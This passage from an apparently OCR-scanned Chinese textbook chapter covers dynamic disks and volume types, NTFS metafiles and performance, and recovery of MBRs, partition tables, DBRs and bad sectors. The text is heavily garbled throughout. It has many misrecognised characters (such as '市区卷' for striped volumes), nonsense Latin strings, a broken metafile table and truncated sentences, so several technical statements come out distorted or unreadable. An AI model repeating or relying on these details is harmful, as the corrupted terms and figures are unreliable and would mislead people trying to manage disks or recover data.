磁盘 卷 者 是 动态 卷 ,不 能 包含 分 区 或 逻辑 驱动 硕 。 另 外 ,一块 人 硬盘, 要 么 是 基本 磁盘 ,要 么 就 
是 动态 磁盘 ,也 就 是 说 ,在 一 块 硬盘 上 不 会 同时 出 现 两 种 类 型 的 卷 。 

1. 基本 磁盘 

初始 时 一 个 人 磁盘 被 设 为 基本 磁盘 。 新 添加 的 磁盘 也 被 设 为 基本 磁盘。 并 且 和 Windows 
NT4. 0 非 容 。 基 本 磁盘 可 以 包含 最 多 4 个 基本 分 区 ,或 者 3 个 基本 分 区 和 一 个 扩展 分 区 ， 
使 用 与 分 区 和 逻辑 相似 的 管理 方式 ,但 是 称 为 卷 或 基本 分 区 ,以 便 和 以 前 的 逻辑 盘 相 区 别 。 

2. 动态 磁盘 

动态 磁盘 是 从 Windows 2000 开始 的 新 特性 。 相 对 于 基本 磁盘 , 它 提 供 更 加 灵活 的 管 
理 和 使 用 特性 。 可 以 在 动态 磁盘 上 实现 数据 的 容错 、 高 速 的 读 写 操作 、 相 对 随意 的 修改 着 大 
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小 等 操作 , 而 不 能 在 基本 磁盘 上 实现 。 

一 块 基本 磁盘 只 能 包含 4 个 分 区 ,它们 是 最 多 3 个 主 分 区 和 一 个 扩展 分 区 ,扩展 分 区 可 
以 包含 数 个 逻辑 盘 。 而 动态 磁盘 没有 卷 数量 的 限制 ,只 要 磁盘 空间 允许 ,就 可 以 在 动态 磁盘 
中 任意 建立 卷 。 

在 基本 磁盘 中 ,分 区 是 不 可 跨越 磁盘 的 。 然 而 ,通过 使 用 动态 磁盘 ,用 户 可 以 将 数 块 磁 
盘 中 的 空余 磁盘 空间 扩展 到 同一 个 卷 中 来 增 大 卷 的 容量 。 

基本 磁盘 的 读 写 速度 由 便 件 决定 ,不 可 能 在 不 额外 消费 的 情况 下 提升 磁盘 效率 。 用 户 
可 以 在 动态 磁盘 上 创建 市 区 卷 来 同时 对 多 块 磁盘 进行 谈 写 ,显著 提升 磁盘 效率 。 

基本 磁盘 不 可 容错 ,如 果 没 有 及 时 备份 而 遭遇 磁盘 失败 ,会 有 极 大 的 损失 。 用 户 可 以 在 
动态 磁盘 上 创建 镜像 卷 ,所 有 内 容 日 动 实时 被 镜像 到 镜像 磁盘 中 ,即使 遇 到 磁盘 失败 也 不 必 
担心 数据 损失 。 用 户 还 可 以 在 动态 磁盘 上 创建 带 有 奇偶 校 验 的 带 区 卷 , 来 保证 提高 性 能 的 
同时 为 磁盘 添加 容错 性 。 

总 体 来 讲 , 动 态 磁盘 在 日 稼 的 管理 .服务 的 性 能 和 容错 方面 都 能 更 好 地 为 用 户 服务 。 

动态 磁盘 特点 如 下 。 

d) 可 以 任意 更 改 人 磁盘 容 量 。 动 态 磁 盘 在 不 重新 启动 计算 机 的 情况 可 以 修改 磁盘 容量 
大 小 ,而 且 不 会 丢失 数据 ,而 基本 磁盘 如 果 要 改变 分 区 容量 就 会 丢失 全 部 数据 。 

(2) 磁盘 空间 的 限制 。 动 态 磁 盘 可 以 连接 磁盘 中 不 连续 的 磁盘 空间 ,从 而 提高 资源 的 
利用 率 。 但 是 ,基本 磁盘 的 分 区 的 要 求 , 必 须 是 同一 位 盘 上 的 连续 空间 ,所 以 基本 磁盘 的 分 
区 的 最 大 容量 当然 也 就 是 磁盘 的 容量 。 

(3) 卷 集 或 分 区 个 数 。 动 态 磁 盘 在 一 个 磁盘 上 可 创建 的 卷 集 个 数 没有 限制 。 

(4) 磁盘 配置 信息 。 动 态 磁盘 的 磁盘 配置 信息 存放 在 磁盘 上 ,而 不 是 注册 表 或 其 他 不 
利于 更 新 的 地 方 ,磁盘 配置 信息 同时 也 被 复制 到 其 他 动态 磁盘 上 ,这 就 方便 了 动态 磁盘 在 不 
同 计 算 机 间 的 移植 。 

3. € 

(1) 简单 卷 。 人 简单 卷 是 在 单独 的 动态 磁盘 中 的 一 个 卷 , 它 与 基本 磁盘 的 分 区 较 相 似 。 
但 它 没 有 空间 的 限制 ,以 及 数量 的 限制 不 会 影响 其 中 的 数据 。 当 简单 卷 的 空间 不 够 用 时 ,可 
以 通过 扩展 卷 来 扩充 其 空间 ,而 这 丝毫 不 会 影响 其 中 的 数据 。 


(2) 跨 区 卷 。 跨 区 卷 的 存储 数据 的 方法 是 , 先 将 第 一 块 磁盘 存储 满 ,然后 存储 后 面 的 磁 
盘 。 而 跨 区 卷 的 目的 就 是 用 来 将 多 块 物理 磁盘 中 的 空余 空间 分 配 成 一 个 卷 , 从 而 提高 了 资 
源 的 利用 率 。 


(3) 市 区 卷 。 市 区 卷 是 由 两 个 或 多 个 磁盘 中 的 空余 空间 组 成 的 卷 (最 多 32 块 磁盘 ) ,在 
向 带 区 卷 中 写 人 数据 时 ,数据 被 分 割 成 64KB 的 数据 块 , 然 后 同时 向 阵列 中 的 每 一 块 磁盘 写 
入 不 同 的 数据 块 。 这 个 过 程 虽 然 显 著 提 高 了 磁盘 的 效率 和 性 能 ,但 带 区 卷 不 提供 容错 功能 。 

(4) 镜像 卷 。 这 里 可 以 很 简单 地 解释 镜像 卷 为 一 个 市 有 T 同 副本 的 简单 卷 , 它 
需要 两 块 磁 盘 。 一 块 存储 运作 中 的 数据 ,一 块 存储 完全 一 样 的 副本 , 当 一 块 磁盘 失败 时 , 男 一 
块 磁盘 可 以 立即 使 用 ,避免 了 数据 丢失 。 镜 像 卷 虽 然 提 供 了 容错 性 ,但 它 不 提供 性 能 的 优化 。 

(5) RAIDS 4. RAIDS 卷 就 是 含有 奇偶 校 验 的 带 区 卷 ,通过 为 卷 集中 的 磁盘 组 添加 一 
个 奇偶 校 验 值 , 这 样 在 确保 了 带 区 卷 优越 性 能 的 同时 ,还 提供 了 容错 性 。RAID5 卷 至 少 包 
含 3 RMSE RS 32 块 ,阵列 中 任意 一 块 磁盘 失效 时 ,都 可 以 由 其 他 磁盘 中 的 信息 做 运算 ， 
并 将 失败 的 磁盘 中 的 数据 恢复 。 
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15.3.6 NTFS 文件 系统 结构 分 析 


1. NTFS 的 思想 

NTFS 的 文件 系统 由 DBR 和 元 文件 共同 组 成 ,其 他 文件 和 目录 通过 文件 系统 来 管理 ， 
这 和 FAT 文件 系统 中 通过 DBR、FAT 及 FDT 来 管理 具体 的 文件 和 目录 是 一 样 的 ,不 同 的 
是 ,在 NTFS 中 组 成 文件 系统 的 DBR 和 元 文件 本 号 也 是 文件 ,而 组 成 FAT 文件 系统 的 
FAT 和 EDT, 本 身 却 并 不 是 文件 ,采用 和 文件 不 一 样 的 管理 方式 ,这 正 是 NTFS 的 思 
想 一 一 一 切 都 是 文件 。 

NTFS 分 区 内 部 全 部 由 簇 组 成 ,基本 没有 居 区 的 概念 ,也 就 是 从 分 区 一 开始 就 安排 了 
族 , 即 第 0 Fe 

(1) NTFS 分 区 全 部 由 文件 组 成 ,也 就 是 说 ,管理 分 区 的 单元 (类 似 FATI 中 的 FATI 表 、 
DBR) 也 由 文件 组 成 ,整个 NTFS 分 区 利用 各 干 文件 来 管理 全 部 文件 (包括 管理 月 身 )。 

(2) NTFS 分 区 有 三 大 类 文件 : 元 文件 .数据 文件 .目录 文件 。 元 文件 就 是 管理 和 维护 
NTFS 分 区 的 系统 文件 。 以 “$ "开头 ,对 于 普通 用 户 不 可 见 , 目 前 一 般 为 16 个 左右 。 

(3) 文件 由 者 干 属 性 组 成 (文件 名 属性 ,数据 属性 .安全 属性 等 ) 。 

(4) 属性 分 成 两 类 : 常 驻 属 性 .非常 驻 属性 。 

2. NTFS 的 DBR 

对 于 基本 分 区 和 简单 卷 , NTFS 的 引导 局 区 与 FAT 的 引导 扇 区 作用 相同 ,由 MBR 引 
导 至 活动 分 区 的 DBR ,再 由 DBR 引导 操作 系统 。 

3. NTFS 的 元 文件 

NTFS 元 文件 及 其 功能 如 表 15-2 所 示 。 

表 15-2 NTFS 元 文件 及 其 功能 


$MFT | 





0 $ MFT 主 文件 表 本 身 
1 主 文件 表 的 部 分 镜像 
2 | SLogFile 日 志文 件 
3 XH 
属性 定义 列表 
5 根 目录 
| 位 图 文人 
7 引导 文件 
; 权限 信息 
I 大 小 写 对 应 表 
11 扩展 元 数据 目录 
12 磁盘 配额 信息 
13 对 象 ID 文件 
14 用 户 使 用 信息 
15 重 分 析 点 文件 
16~23 保留 
23 十 用 户 文件 和 目录 
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每 个 MFT 记录 都 对 应 着 不 同 的 文件 。 如 果 一 个 文件 有 很 多 属性 或 分 散 成 很 多 雁 片 ， 
就 很 有 可 能 需要 多 个 文件 记录 。 

$ MFT 中 的 第 0 个 记录 即 $ MFT 本 身 。 

第 1 个 记录 是 MFT 文件 的 镜像 文件 $ MEFTMirr ,用 来 保证 文件 系统 的 可 靠 性 。 

第 2 个 记录 是 日 志文 件 $ LogFile, 其 目的 就 是 为 了 保证 系统 的 可 恢复 性 与 安全 性 。 当 
系统 运行 时 ,NTFS 就 会 在 日 志文 件 中 记录 所 有 影响 NTFS 卷 结 构 的 操作 ,包括 文件 的 创 
建 和 改变 目录 结构 的 命令 ,从 而 在 系统 失败 时 能 够 恢复 NTFS 卷 。 

第 3 个 记录 是 卷 文 件 $ Volume, 它 包含 卷 名 、NTFS 的 版 本 和 一 个 标志 位 表示 磁盘 是 

第 4 个 记录 是 属性 定义 表 $ AttrDef ,其 用 途 就 是 存放 文件 属性 ,用 来 表示 该 文件 是 否 

第 5 个 记录 是 根 目 录 , 其 用 途 就 是 存放 根 目 录 下 的 所 有 文件 及 目录 索引 。 

第 6 个 记录 是 位 图 文件 $ Bitmap ,其 用 途 就 是 存放 NTFS 4 By jx fii Hj fe DU ,利用 位 图 
文件 中 的 每 一 位 来 标识 该 篮 是 空闲 还 是 已 分 配 。 由 于 该 文件 可 以 很 容易 被 扩大 ,因此 
NTFS 的 卷 可 以 很 方便 地 动态 扩大 ,而 FAT 格式 的 文件 系统 由 于 涉及 FAT 表 的 变化 , 因 
此 不 能 随意 对 分 区 大 小 进行 调整 。 

第 7 个 记录 是 引导 文件 $ Boot, 其 用 途 就 是 存放 Windows NT/2000/XP/2003 的 引导 
程序 代码 ,是 非常 重要 的 系统 文件 。 

第 8 个 记录 是 坏 簇 文件 $ BadClus, 它 记录 着 该 卷 中 所 有 损坏 的 簇 号 ,防止 系统 对 其 进 
行 分 配 使 用 。 

第 9 个 记录 是 安全 文件 $ Secure, 它 存储 着 整个 卷 的 安全 描述 符 数 据 库 。NTFS 文件 
和 目录 都 有 各 自 的 安全 描述 符 , 为 节省 空间 ,NTEFS 将 文件 和 目录 的 相同 描述 符 存放 在 此 公 
共 文 件 中 。 

第 11 个 记录 是 扩展 元 数据 日 录 $ \Extend metadata directory. 

第 12 个 记录 是 配额 管理 文件 $ \Extend\ $ Quota, 

第 13 个 记录 是 对 象 ID 文件 $\Extend\ $ ObjID. 

第 14 个 记录 是 变更 日 志文 件 $\Extend\ $ Usn]rnl, 

第 15 个 记录 是 重 解析 点 文件 $ NExtendN $ Reparse。 

第 16 一 23 记录 是 系统 保留 的 记录 ,用 于 将 来 扩展 。 


15.3.7 NTFS 的 性 能 


用 户 可 以 决定 许多 影响 NTFS 卷 性 能 的 因 系 ,比较 重要 的 有 NTFS 卷 的 类 型 .速度 、 卷 
包含 的 磁盘 数量 等 。 

除 上 述 因 素 外 ,下 面 的 因素 也 可 以 影响 NTFS 卷 的 性 能 。 

C1) 秘 和 空间 分 配 单位 的 大 小 。 

(2) 该 卷 是 直接 创建 的 还 是 由 一 个 FAT 卷 转 换 来 的 。 

(3) 该 卷 是 否 使 用 了 NTFS 的 压缩 功能 。 

(4) 经 和 党 访 问 的 文件 中 的 肆 片 和 位 置 。 
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例如 , 主 文件 表 (MFT) 目录、 包含 NTFS 频繁 使 用 的 数据 的 文件 ,缓冲 文件 和 频繁 使 
用 的 用 户 文 件 。 

禾 的 大 小 :根据 NTFS 卷 要 存储 的 文件 的 平均 大 小 和 类 型 来 选择 秘 的 大 小 。 

理想 情况 下 , 复 的 大 小 要 能 整除 文件 大 小 (最 接近 的 数值 ) ,理想 的 篮 大 小 可 以 将 LO 
时 间 降 至 最 低 ,并 最 大 限度 地 利用 磁盘 的 空间 。 应 该 注意 的 是 ,无 论 在 任何 情况 下 使 用 大 于 
AKB 的 篮 都 会 有 下 述 的 负面 影 

(1) 磁盘 碎片 整理 工具 不 能 整理 这 个 卷 。 

(2) 不 能 使 用 NTFS 的 文件 压缩 功能 。 

(3) 浪费 的 磁盘 空间 增加 。 

由 FAT 转换 而 来 的 NTFS: 从 FAT 转换 到 NTFS 的 卷 将 失去 NTFS 的 一 些 性 能 优 
mm. MFT 可 能 出 现 碎 请, 而 且 不 能 在 根 卷 上 设置 NTFS 的 文件 访问 权限 。 

要 检查 MFT LERA ATLA BS re: 开始 一 程序 一 附件 一 系统 工具 一 磁盘 人 碎 
片 整理 ,对 一 个 驱动 器 进行 分 析 ,然后 单 击 “ 查 看 报告 ”按钮 ,将 鼠标 指针 移动 到 MET 碎片 。 

把 一 个 FAT 卷 转换 为 NTFS Je SE HJ haie 512 个 字 节 ,增加 了 出 现 碎片 的 可 能 性 ， 
而 且 在 整理 碎片 时 需要 花费 更 多 的 时 间 。 

基于 上 述 原 因 , 最 好 在 最 初 格式 化 时 就 把 硬盘 格式 化 为 NTFS 文件 系统 。 

NTFS 文件 压缩 功能 ; NTFS 压缩 功能 可 以 对 单个 文件 .整个 文件 夹 或 NTFS 卷 上 的 整个 
目录 树 进行 压缩 。 可 以 在 浏览 器 窗口 的 属性 对 话 框 中 对 文件 ,文件 夹 .NTFS 卷 进 行 压 缩 。 

肆 片 整理 : 如 果 磁 盘 的 雁 片 过 多 ,那么 访问 一 个 文件 就 需要 磁头 移动 得 更 多 ,从 而 影响 
访问 的 效率 。 可 以 经 常 地 运行 碎片 整理 工具 来 完成 这 一 工作 。 

磁盘 碎 上 月 整理 工具 使 用 户 可 以 快速 对 一 个 卷 进行 分 析 , 并 加 用 户 提 出 是 否 需要 对 这 个 
卷 进行 整理 的 建议 。 

禁止 非 必需 的 NTFS 功能 如 下 。 

C1) 禁止 创建 短文 件 名 。 

(2) 禁止 最 近 访 问 更 新 。NTFS 将 更 新 最 近 访 问 的 目录 的 日 期 /时 间 标 签 ,在 容量 比较 
大 的 NTFS 卷 上 , 它 会 降低 NTFS 卷 的 性 能 。 

(3) 为 主 文件 表 (MFT) 保 留 适 当 的 空间 。MFT 在 NTFS 卷 中 扮演 着 重要 的 角色 ,对 
其 性 能 的 影响 很 大 ,系统 空间 分 配 、 读 写 磁 盘 时 会 频繁 地 访问 MFT, 因 此 MFT 对 MTFS 的 
卷 的 性 能 有 着 至 关 重 要 的 影响 。 

(4) 必须 在 创建 NTFS 卷 之 前 改变 注册 表 。 对 注册 表 的 修改 只 影响 此 后 建立 的 NTFS 
卷 , 对 目前 现 有 的 卷 没有 影 啊 , 这 些 着 还 会 保持 原来 的 MET 设置 。 为 MFT 分 配 更 多 的 空 
间 不 会 影响 正常 的 存储 空间 ,因为 一 旦 正常 的 文件 存储 空间 满 后 ,NTFS 将 使 用 MFT IX. 
有 了 时 这 也 是 导致 MFT 区 更 容易 出 现 碎片 的 原因 。 因 此 必须 注意 用 户 文 件 已 经 占用 的 存储 
空间 ,在 卷 上 保留 一 定 的 可 用 空间 ,这样 MET 就 可 以 有 足够 的 保留 空间 。 


15.4 数据 恢复 


15.4.1 数据 恢复 的 定义 
长 期 以 来 ,计算 机 领域 对 数据 恢复 没有 一 个 得 到 广泛 认可 的 定义 。 首 先 ,应 当 给 计算 机 
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数据 一 个 广义 的 定义 。 一 些 人 和 觉得 ,只 有 类 似 文本 文件 ,数据 库 中 的 记录 或 表 才 是 数据 ,其 
实 从 广义 上 说 ,位 于 计算 机 存储 介质 上 的 信息 都 是 数据 。 任 何 使 这 些 信 息 发 生 非 主 观 意 愿 
之 外 的 变化 都 可 视 为 破坏 。 那 么 相应 地 ,数据 恢复 就 是 把 遭受 破坏 或 误 操 作 导 致 于 失 的 数 
据 找 回来 的 过 程 。 

这 些 数 据 可 以 分 为 两 大 类 : 系统 数据 和 用 户 数据 。 对 于 系统 数据 ,由 于 变化 不 大 ,具有 
通用 性 ,恢复 起 来 也 相对 容易 一 些 ( 一 些 非 常 重要 的 配置 信息 ,应 该 划 为 用 户 数据 , 即 所 有 没有 
通用 性 的 、. 变 化 的 数据 都 应 划 为 用 户 数据 ), 才 让 人 们 觉得 狭义 的 数据 恢复 不 包括 对 它们 的 恢 
复 。 但 系统 出 现 问 题 ,也 是 一 件 非 常 复杂 的 事情 ,尤其 是 现在 的 系统 都 很 大 , 重 交 一 次 非常 耗 
时 耗 力 。 对 于 大 多 数 用 户 而 言 ,数据 的 重要 性 可 以 用 一 句 话 来 概括 一 一 硬盘 有 价 ,数据 无 价 。 

数据 丢失 的 主要 原因 如 下 。 

COD 黑客 攻击 ,病毒 感染 。 

(2) RERE : 误 格 式 化 、 误 分 区 、 误 删除 等 。 

(3) 便 软 件 故 障 。 

15.4.2 数据 恢复 的 原理 
造成 数据 丢失 的 原因 非常 多 ,每 种 情况 都 有 特定 的 钙 状 出 现 , 或 者 多 种 症状 同时 出 
- 般 情 况 下 ,只 要 数据 区 没有 被 覆盖 ,都 是 可 以 恢复 的 。 例 如 , 当 磁 盘 、 分 区 、 文 件 遭 
ave. FLAN RAE A UE B E SR x. A E TK BH EK EEE AY H 2R JÉ CB Bl) OT, 3 ET 
以 恢复 的 。 然 而 也 存在 不 能 恢复 的 情况 ,如 数据 被 覆盖 、 低 级 格式 化 .磁盘 盘 片 严重 损 
1. 数据 恢复 类 型 


COD 系统 数据 恢复 : 主 引 导 区 .引导 扇 区 FAT 区域 恢复 NTFS 中 元 数据 恢复 …… 
(2) 用 户 数据 恢复 : 恢复 用 户 文件 。 

2. 数据 恢复 手段 

(1) TAKE. 

优点 : 非 专业 人 员 可 用 速度 快 。 

缺点 : 因 恢 复 造 成 不 能 恢复 。 

(2) 手工 恢复 。 


be: 效率 不 局 。 
15.4.3 主 引 导 记 录 的 恢复 

在 人 硬件 无 误 的 情况 下 ,数据 恢复 的 第 一 步 一 般 是 主 引 寻 记 录 的 恢复 。 主 引 寻 记录 的 恢 
复 比较 简单 ,因为 它 是 系统 数据 。 虽 然 可 能 会 由 不 同 的 软件 来 建立 ,代码 也 会 略 有 差别 ,但 
功能 部 一 样 , 即 使 是 多 系统 引 叶 ,也 没有 多 大 难度 ,可 在 一 种 系统 引 叶 正 第 之 后 ,备份 要 恢复 
的 数据 ,然后 再 恢复 其 多 系统 引导 。 

(1) MBR 恢复 原理 : 引 寻 出 区 遭 到 破坏 后 系统 不 能 引导 ,没有 所 示 , 但 从 其 他 系统 可 
访问 此 硬盘 。 
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(2) MBR 恢复 手段 如 下 。 

CD 使 用 几 种 工具 ,如 Fdisk 及 一 些 磁盘 编辑 工具 等 。 

O 注意 一 些 安 波 了 第 三 方 的 多 引导 程序 、 其 他 非 Windows 操作 系统 、 磁 盘 管 理工 具 
(如 还 原 精灵 ) 的 便 盘 ,在 使 用 上 述 方 法 后 会 出 现 一 些 意 想 不 到 的 后 果 。 

3) MBR 刷 区 结束 标志 位 。 


15.4.4 分 区 的 恢复 


分 区 恢复 一 般 是 数据 恢复 的 第 二 步 。 重 建 分 区 表 的 工作 一 般 手 动 完成 ,个 别 情况 也 可 
以 使 用 软件 日 动 完 成 。 

恢复 方法 : 手工 重建 。 

分 区 恢复 需要 的 信息 如 下 。 

d) 开始 磁头 EE aAA KS 

(2) 所 用 的 系统 。 

(3) 结束 磁头 , 柱 面 和 肩 区 号 。 

(4) JF Bi DC BE 

(5) 占用 总 扇 区 数 。 

分 区 恢复 的 依据 : AA55 标志 位 。 

快速 定位 标志 位 : 硬盘 分 区 软件 的 最 小 分 区 单位 是 柱 面 , 它 不 会 把 一 个 柱 面 分 在 两 个 
分 区 中 ,这样 做 的 目的 是 提高 访问 速度 。 那 么 一 个 柱 面 是 由 多 少 个 字 节 构成 呢 ? 可 以 简单 
地 计算 一 下 ,一般 来 说 ,一 个 柱 面 是 有 255 个 磁头 ,每 个 磁头 有 63 Sh. RE DC HH 512 
个 字 节 构成 ,所 以 一 个 柱 面 的 字 节 数 为 1X255X63X512 王 8225280 字 节 ,因此 加 速 分 区 标 
志 的 查找 可 以 在 查找 条 件 中 通过 查找 对 该 值 求 余 结果 为 510 的 5AA。 


15.4.5 0 磁道 损坏 的 修复 


虽然 系统 在 管理 硬盘 时 ,采用 不 使 用 0 磁道 的 所 有 扇 区 ,只 使 用 1 扇 区 (也 可 能 占用 
-两 个 肩 区 对 MBR 进行 备份 ) 的 方式 来 对 0 磁道 进行 保护 ,但 由 于 各 种 各 样 的 原因 ,很 
多 时 候 , 硬 盘 的 0 磁道 还 是 会 出 现 损坏 。 而 且 只 是 0 磁道 损坏 ,就 使 整个 硬盘 报废 ,很 是 
UH 
道 损 坏 的 “修复 ?原理 : 使 用 PM 修复 损坏 的 0 磁道 , 即 分 区 避 开 0 磁道 ,其 他 工具 
- 
其 实 , 可 以 利用 磁道 修复 工具 ,将 0 磁道 往 后 逻辑 移动 ,使 得 正常 的 1 磁道 蔡 代 0 磁道 
使 用 , 即 让 硬盘 从 1 磁道 开始 使 用 ,从 而 修复 磁道 。 
震 要 注意 的 是 ,使 用 这 种 方法 处 理 的 人 硬盘 ,不 能 再 使 用 Fdisk 之 类 的 分 区 软件 进行 分 
区 ,因为 Fdisk 又 会 使 用 原来 的 0 磁道 ,从 而 再 次 提示 “0 磁道 损坏 ”。 
这 类 软件 有 DiskEdit、PCTOOL.、PM 等 。 


15.4.6 硬盘 逻辑 锁 的 处 理 


使 盘 “ 逻 和 辑 锁 ” 的 原理 就 是 将 分 区 链 链接 成 一 个 环 。 由 于 使 盘 检测 分 区 时 ,必须 查找 完 
所 有 的 分 区 表 。 因 此 只 要 系统 检测 分 区 表 , 束 一 定 进 入 死 循环 的 状态 ,从 而 系统 无 法 引 守 ， 
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不 能 进入 人 硬盘 。 而 解决 这 个 问题 需要 以 下 方法 。 
其 原理 就 是 避 开 系统 对 分 区 表 的 检测 ,直接 读 磁 盘 肩 区 ,如 以 下 几 种 方法 。 
CD 使 用 DM 破解 硬盘 逻辑 锁 。 
(2) 使 用 GHOST 破解 硬盘 逻辑 锁 。 
(3) 使 用 热 搬 拔 破 解 硬 盘 逻 辑 锁 。 
(4) 使 用 * 依 格 磁盘 救星 ”破解 便 盘 逻辑 锁 。 


15.4.7 磁盘 坏 道 的 处 理 


1. 逻辑 坏 道 修复 

使 用 磁盘 扫描 工具 自动 修复 ,如 Windows 下 的 磁盘 扫描 工具 ,但 是 这 种 方法 在 很 大 程 
度 上 只 是 自动 修复 逻辑 坏 道 , 而 不 能 自动 修复 物理 坏 道 。 

2. 物理 坏 道 修复 

(1) 用 Scandisk 检查 物理 坏 道 ,将 物理 坏 道 标记 为 坏 道 ,以 后 不 表 对 这 块 区 域 进 行 读 写 
操作 。 因 为 物理 坏 道 具有 “传染 性 ”, 会 器 周边 扩散 , 叶 致 存储 于 坏 道 附近 的 数据 也 处 于 危险 的 
境地 。 然 后 再 使 用 Partition Magic 或 DiskGen 等 工具 软件 进行 分 区 .隐藏 .删除 .合并 等 操作 。 

(2) 低级 格式 化 修复 。 如 果 上 述 方法 不 自 效 ,那么 可 以 考虑 使 用 低级 格式 化 来 处 理 。 
但 是 低级 格式 会 重新 进行 划分 磁道 和 有 朵 区 .标注 地 址 信息 、 设 置 交 义 因 了 于 等 操作 , 震 要 长 时 
间 读 写 便 盘 ,每 使 用 一 次 就 会 对 人 硬盘 造成 剧烈 展 损 。 而 对 于 逻辑 坏 道 , 不 要 使 用 低级 格式 化 
程序 作为 修复 手段 。 夯 外 ,低级 格式 将 彻 确 探 除 人 硬盘 中 的 所 有 数据 ,这 一 过 程 是 不 可 逆 的 。 
因此 低级 格式 化 只 能 在 万 不 得 已 的 情况 下 使 用 ,低级 格式 化 后 的 硬盘 要 使 用 Format 命令 
进行 高 级 格式 化 后 才能 使 用 。 

(3) 使 用 FBDISK。FBDISK 是 一 个 能 够 把 有 坏 磁 起 的 使 盘 进行 重新 分 区 的 工具 软件 。 
它 的 主要 功能 是 将 有 坏 磁 道 的 便 盘 和 目 动 重新 分 区 ,同时 把 坏 磁 着 设 为 隐藏 分 区 I AN 
可 用 分 区 ,并 将 坏 磁 道 分 隔 开 以 防止 其 进一步 扩散 。 当 人 硬盘 中 的 坏人 磁道 过 于 分 散 时 , 它 就 会 
相应 地 产生 多 个 分 散 的 可 用 分 区 ,但 限于 分 区 规则 只 能 设 4 个 主 分 区 。 该 程序 会 自动 选择 
其 中 最 大 的 4 个 分 区 设 为 可 用 ,其 他 则 设 为 隐藏 。 

3. 如 何 减 少 坏 道 

(OD 保持 清洁 ,防止 静电 。 

(2) 轻 拿 轻 放 ,正确 关机 。 

(3) 注意 整理 ,注意 备份 。 

(4) 注意 防毒 ,注意 设置 。 

(5) 硬盘 出 现 少 量 坏 道 时 ,要 及 时 维护 , 避 倪 坏 逢 扩大。 因为 磁头 在 谈 取 坏 道 上 的 数据 
时 ,需要 反复 重 试 , 极 易 造成 坏 道 的 扩散 。 

(6) 当 人 硬盘 分 区 表现 出 严重 损坏 ,一般 根据 软件 不 能 修复 时 ,可 以 用 DM 等 低级 格式 化 

(7) 要 注意 环境 温度 与 湿度 的 影 

(8) 尽量 不 要 使 用 便 盘 不 缩 技 术 。 

(9) 在 工作 中 不 能 移动 便 盘 。 
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15.4.8 DBR 的 恢复 


1， 使 用 Format 恢复 DBR 

如 果 该 分 区 没有 什么 重要 数据 ,或 者 数据 已 经 做 过 备份 ,可 以 直接 进行 覆盖 操作 ,那么 
恢复 DBR 最 好 的 方法 就 是 直接 高 级 格式 化 ,快速 格式 化 或 完全 格式 化 均 可 。 如 果 没 有 分 区 
格式 和 容量 限制 ,在 DOS 下 或 在 Windows 下 格式 化 没有 什么 区 别 , 只 是 速度 上 有 些 差异 。 
格式 化 的 方法 比较 彻底, 可 以 完全 重新 安排 数据 存储 XE DA BU HJ XC EERE Fr HIR dom I. 

此 方法 虽然 简单 , 却 不 能 恢复 数据 。 尤 其 是 如 果 选 择 了 一 些 不 同 的 参数 ,如 选择 了 不 同 
的 系统 保留 户 区 使 用 了 大 小 不 同 的 徐 、.FAT 表 大 小 改变 等 ,都 会 造成 数据 覆盖 ,从 而 增加 
数据 恢复 的 困难 。 

2. 使 用 DiskEdit 恢复 DBR 

由 于 DiskEdit 具有 磁盘 扇 区 编辑 功能 ,因此 可 以 用 来 恢复 DBR。 高 版 本 的 格式 化 工具 
在 格式 化 分 区 时 ,一 般 都 会 在 第 六 扇 区 对 DBR 做 备份 。 也 可 以 自己 做 一 个 备份 ,备份 在 一 
个 系统 不 用 的 扇 区 里 ,如 系统 保留 扇 区 中 除 MBR、DBR 以 外 的 某 个 扇 区 .数据 区 的 最 后 几 
个 天 区 ,或 者 剩余 届 区 里 。 数 据 区 的 最 后 几 个 悄 区 可 能 不 够 保险 ,如 在 整理 磁盘 或 分 区 格式 
转换 时 有 可 能 被 才 盖 ,最 好 的 方法 是 备份 在 其 他 存储 介质 上 。 如 果 这 个 备份 完好 无 损 , 就 可 
以 直接 使 用 这 个 备份 恢复 损坏 的 DBR。 

恢复 DBR 后 ,系统 就 可 以 访问 该 驱动 闫 了 ,如 果 FAT 和 FDT 都 设 有 受到 损坏 , 那 就 说 
明 已 经 成 功 的 恢复 了 一 个 分 区 。 

当然 ,做 数据 恢复 没有 这 人 么 简单 。 如 果 备 份 的 DBR 也 损坏 了 ,那么 ,就 得 从 相同 文件 系 
统 的 分 区 里 复制 一 个 DBR。 这 些 DBR 的 引导 代码 都 是 一 样 的 ,复制 完 DBR 后 需要 进行 相 
应 的 参数 修改 ,因为 不 同 的 分 区 ,其 FAT 长度、 刻 大 小 .分 区 长 度 等 参数 都 不 同 。 如 果 不 对 
这 些 参数 进行 修改 ,虽然 能 访问 该 驱动 咒 , 但 其 文件 系统 的 参数 都 不 正确 ,不 能 正确 访问 文 
件 ,所 以 ,必须 把 这 些 参数 修改 为 符合 实际 情况 的 参数 。 

3. FAT 分 区 引导 扇 区 恢复 

CD 利用 系统 备份 恢复 。 

(2) 手工 分 析 恢 复 。 

CD 复制 找到 同类 型 系统 同类 型 分 区 的 引导 朵 区 。 

Q) 修改 BPB 参数 。 

CD BRR KA: 根据 卷 的 实际 情况 。 

O fA KA: 引导 扇 区 后 到 FAT1 开始 的 扇 区 数 。 

E er d DC AC: 该 分 区 前 面 的 刷 区 数 , 即 该 分 区 首届 区 的 绝对 肩 区 号 。 

ORK EBM: 该 分 区 总 共 占 用 的 扇 区 数 ，。 

D 每 FAT 表 所 占 扇 区 数 : 可 以 计算 FAT 实际 占用 的 扇 区 数 来 得 到 这 个 数据 。 

引导 目录 的 第 一 复 : 即 根 目 录 的 起 始 篮 号 ,该 复 号 可 以 通过 查找 根 目 录 得 到 ,对 于 
FAT16 其 根 目录 总 是 在 第 二 个 FATI 表 后 面 。 而 FAT32 不 是 这 样 ,FAT32 管理 根 目 录 和 
管理 其 他 目录 是 一 样 的 ,所 以 有 可 能 是 卷 中 的 任意 禾 ,不 过 大 多 效 情 次 下 AT32 的 根 目 录 的 
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4. NTFS 卷 引 导 记 录 与 BPB 参数 恢复 

CD 利用 系统 备份 恢复 : 该 分 区 最 后 一 个 户 区 有 备份 。 
(2) 人 工分 析 恢 复 。 

CD 复制 找到 同类 型 系统 同类 型 分 区 的 引导 朵 区 。 

Q) 修改 BPB 参数 。 


15.4.9 FAT 表 的 恢复 


对 于 CIH 这 种 从 分 区 开始 就 破坏 数据 的 情况 ,一 般 会 造成 前 面部 分 系统 数据 由 于 遭 到 
